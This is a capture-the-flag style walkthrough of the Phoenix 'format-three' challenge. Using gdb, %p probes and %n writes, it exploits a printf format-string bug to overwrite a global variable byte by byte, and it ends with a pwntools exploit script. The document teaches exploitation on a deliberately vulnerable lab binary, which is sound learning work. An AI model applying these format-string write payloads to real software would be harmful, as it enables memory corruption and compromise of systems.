phoenix - format 3
Let's list the files using the ls -la command:
user@phoenix-amd64:~$ ls -la
total 28
drwxr-xr-x 2 user user 4096 Jun 13 15:44 .
drwxr-xr-x 3 root root 4096 Jan 13 2019 ..
-rw-r--r-- 1 user user 220 Jan 13 2019 .bash_logout
-rw-r--r-- 1 user user 3526 Jan 13 2019 .bashrc
-rw-r--r-- 1 user user 675 Jan 13 2019 .profile
-rwxr-xr-x 1 user user 6120 Jun 13 15:44 format-three
Let's analyze the file type of the binary using the file command:
user@phoenix-amd64:~$ file format-three
format-three: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1, not stripped
It is a non-stripped binary.
Let's try running it:
user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
monish
monish
Better luck next time - got 0x00000000, wanted 0x64457845!
It seems like we have to overwrite it with some value.
Let's analyse it in the debugger. There is a variable named changeme:
(gdb) info variables
All defined variables:
Non-debugging symbols:
0x00000000004007e8 __GNU_EH_FRAME_HDR
0x0000000000400850 __EH_FRAME_BEGIN__
0x0000000000400890 __FRAME_END__
0x0000000000600898 __CTOR_LIST__
0x00000000006008a0 __CTOR_END__
0x00000000006008a8 __DTOR_LIST__
0x00000000006008b0 __DTOR_END__
0x00000000006008b8 _DYNAMIC
0x00000000006009f8 _GLOBAL_OFFSET_TABLE_
0x0000000000600a38 __dso_handle
0x0000000000600a40 __TMC_END__
0x0000000000600a40 __bss_start
0x0000000000600a40 _edata
0x0000000000600a40 completed
0x0000000000600a48 dtor_idx
0x0000000000600a60 object
0x0000000000600a90 changeme
0x0000000000600a98 _end
The changeme variable is at 0x0000000000600a90.
Here 0x0000000000600a90 contains bad chars: we cannot pass the null byte \x00.
So let's try the 32-bit version:
user@phoenix-amd64:~$ nm format-three | grep changeme
08049844 B changeme
So changeme is at 0x08049844.
Let's view the source code for a proper understanding:
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int changeme;

void bounce(char *str) {
  printf(str); /* user input is used directly as the format string */
}

int main(int argc, char **argv) {
  char buf[4096];

  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);

  if (changeme == 0x64457845) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    printf(
        "Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
  }

  exit(0);
}
The buffer here has a size of 4096 bytes.
The main condition to pass the program is:
  if (changeme == 0x64457845) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    printf(
        "Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
  }
So we have to overwrite the value of changeme with 0x64457845:
>>> print("\x45\x78\x45\x64")
ExEd
It is very similar to the last challenge.
Now let's pass input with format specifiers to find our offset:
user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x20702520 0x25207025 0x70252070
Better luck next time - got 0x00000000, wanted 0x64457845!
So our input AAAA, which we passed to find the offset location, is at the 12th position.
Now let's try to write to it using %n:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*14)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x8049844 0x20702520 0x25207025
Better luck next time - got 0x00000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!
Now let's split the changeme variable into 4 parts: from 0x08049844 for the last byte (LSB), the 1st part, to 0x08049844+0x3 for the first byte (MSB), the 4th part (1 byte = 8 bits, 1 hex char = 4 bits).
So we are able to write 0x00000054 into changeme with our input and %n.
Let's try increasing it with more data on stdin:
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x44\x98\x04\x08 '+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141
Better luck next time - got 0x00000063, wanted 0x64457845!
Furthermore:
user@phoenix-amd64:~$ python -c "print('AAAABBBB'+'\x44\x98\x04\x08 '+'%p '*13+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAABBBB 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x42424242
Better luck next time - got 0x00000072, wanted 0x64457845!
So if we pass the address of the correct byte and write the values with %n, we can control it with a specific value.
Let's try it from the start:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000059, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000058, wanted 0x64457845!
So we can clearly see that each address we pass adds 5 bytes to the written count with a trailing whitespace and 4 bytes without whitespace.
Let's pass it without whitespace for easier calculation:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000053, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000057, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x0000004c, wanted 0x64457845!
For the second part:
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00006200, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00005600, wanted 0x64457845!
For the third part:
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00620000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00560000, wanted 0x64457845!
For the last part:
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x62000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x56000000, wanted 0x64457845!
Now we know which addresses control which part.
But we need to know what data writes the desired number of bytes with %n into that address.
And note that even our format specifiers change the number of bytes written:
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x53000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%x '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 f7f81cf7 f7ffb000 ffffd748 8048556 ffffc740 ffffc740 fff 0
Better luck next time - got 0x45000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%d '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 -134734601 -134238208 -10424 134514006 -14528 -14528 4095 0
Better luck next time - got 0x46000000, wanted 0x64457845!
So it's going to be trial and error from now on.
On the first byte:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'AAAAAAAAAAA'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'A'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!
But here comes the tricky part: we cannot pass our addresses at different places.
We need to put them in order:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*20)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x80498440x80498450x80498460x80498470x702570250x702570250x702570250x702570250x70257025
Better luck next time - got 0x00000000, wanted 0x64457845!
We have placed them in order; now let's try our trial and error:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%x'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0
Better luck next time - got 0x00000046, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%d'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000-134734601-134238208-10424134514006-14528-1452840950
Better luck next time - got 0x00000047, wanted 0x64457845!
There is no way we could write it as 0x45, so let's aim for 0x145:
>>> int(0x145-0x54)
241
So we need 241 bytes of junk value:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00000145, wanted 0x64457845!
Now we have overwritten it correctly.
Let's do it for the second part:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00014545, wanted 0x64457845!
We need to increase it:
>>> int(0x78-0x45)
51
So 51 bytes of junk are needed:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00017845, wanted 0x64457845!
Now let's go for the third part:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x01787845, wanted 0x64457845!
>>> int(0x145-0x78)
205
We need 205 bytes of junk values:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x02457845, wanted 0x64457845!
Our last part:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x45457845, wanted 0x64457845!
>>> int(0x64-0x45)
31
We need 31 more bytes of junk values:
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'A'*31+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!
That's it! We have completed the challenge.
Let's create an exploit for this:
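The padding arithmetic worked out by trial and error above, as an added example that is not part of the original writeup: it plans the junk before each %n from the starting count and simulates the four overlapping int-sized writes, which also shows the 0x2 that spills into the 4 bytes after changeme. The %p values are constructed from the transcript above; the function names are my own.

```python
# Added example (not from the original writeup): plan the per-%n padding for a
# byte-by-byte write and simulate what the overlapping 4-byte stores leave in memory.
import struct


def count_after_prefix(n_addrs, printed_values):
    """Bytes printf has emitted before the first %n: the 4-byte addresses at the
    start of the input plus whatever the %p specifiers printed."""
    return 4 * n_addrs + sum(len(v) for v in printed_values)


def plan_byte_writes(start_count, target, width=4):
    """Return the junk (in bytes) to place before each of the `width` %n writes.

    Each %n stores the cumulative count; only its low byte lands on the byte we
    aim at, so the padding is taken modulo 256 and the count only ever grows.
    """
    pads = []
    count = start_count
    for want in target.to_bytes(width, "little"):  # LSB first, one address each
        pad = (want - count) % 256  # wrap to the next 0x..want instead of going negative
        pads.append(pad)
        count += pad
    return pads


def simulate_overlapping_writes(start_count, pads, mem_len=8):
    """Emulate int-sized %n stores at base, base+1, base+2, base+3.

    Returns (value of the 4-byte variable, value of the 4 bytes right after it),
    the second being the spill that each later store leaves past the target.
    """
    mem = bytearray(mem_len)  # constructed: changeme followed by 4 untouched bytes
    count = start_count
    for off, pad in enumerate(pads):
        count += pad
        mem[off:off + 4] = struct.pack("<I", count)  # little-endian int store
    return struct.unpack_from("<I", mem, 0)[0], struct.unpack_from("<I", mem, 4)[0]


if __name__ == "__main__":
    # What the 11 %p printed in the transcript (constructed from the page above).
    pops = ["0", "0", "0", "0xf7f81cf7", "0xf7ffb000", "0xffffd748",
            "0x8048556", "0xffffc740", "0xffffc740", "0xfff", "0"]
    start = count_after_prefix(4, pops)         # 84 == 0x54, as on the page
    pads = plan_byte_writes(start, 0x64457845)   # [241, 51, 205, 31]
    final, spill = simulate_overlapping_writes(start, pads)
    print(hex(start), pads, hex(final), hex(spill))
```

The spill value is why a byte-by-byte %n write is only safe when the 3 bytes after the target are scratch; here they are past _end of the data, but in a real program they could be another variable.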
user@phoenix-amd64:~$ cat exploit.py
from pwn import *
junk='A'
changeme=0x08049844
buf=""
buf+=p32(changeme)
buf+=p32(changeme+1)
buf+=p32(changeme+2)
buf+=p32(changeme+3)
buf+='%p'*11
buf+=junk*241
buf+='%n'
buf+=junk*51
buf+='%n'
buf+=junk*205
buf+='%n'
buf+=junk*31
buf+='%n'
print(buf)
Let's try running it:
user@phoenix-amd64:~$ python exploit.py | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!
Done! We have completed our "format-three" challenge.